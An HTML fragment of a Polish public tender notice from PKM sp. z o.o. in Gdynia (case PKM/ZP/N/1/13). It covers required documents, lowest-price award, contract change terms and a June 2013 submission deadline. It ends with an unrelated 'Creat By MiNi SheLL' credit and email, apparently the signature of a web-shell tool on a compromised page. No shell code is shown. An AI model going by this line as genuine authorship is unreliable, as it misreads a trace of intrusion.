<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ Formularz oferty, b/ oświadczenie o wykorzystaniu zasobów innych podmiotów, c/ wykaz środków czystości, których Wykonawca użyje do realizacji  przedmiotu zamówienia, d/ jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż w terminie wskazanym w III.4.3</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany treści umowy (na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych) zawartej w wyniku przeprowadzenia niniejszego postępowania w następujących przypadkach:
- w przypadku zmiany przepisów prawa  mających wpływ na treść umowy (od daty wejścia w życie przepisów określających zmianę, np. zmiana wysokości stawki podatku VAT dotycząca przedmiotu niniejszego zamówienia publicznego) .
Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w ww. zakresie. 
Ww. zmiany mogą zostać wprowadzone jedynie w przypadku, gdy obie Strony umowy (Zamawiający i Wykonawca) zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne i niezbędne dla prawidłowej realizacji umowy. Wszystkie ww. zmiany wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pkmgdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PKM sp. z o.o. ul. Chwaszczyńska 169 81-571 Gdynia pokój numer 3, sekretariat dokument nieodpłatny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 10:00, miejsce: PKM sp. z o.o. ul. Chwaszczyńska 169 81-571 Gdynia pokój numer 3, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1/ przedmiot zamówienia nie jest finansowany ze środków Unii Europejskiej, 2/ numer postępowania: PKM/ZP/N/1/13, 3/ Zamawiający nie dopuszcza możliwości porozumiewania się drogą elektroniczną.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com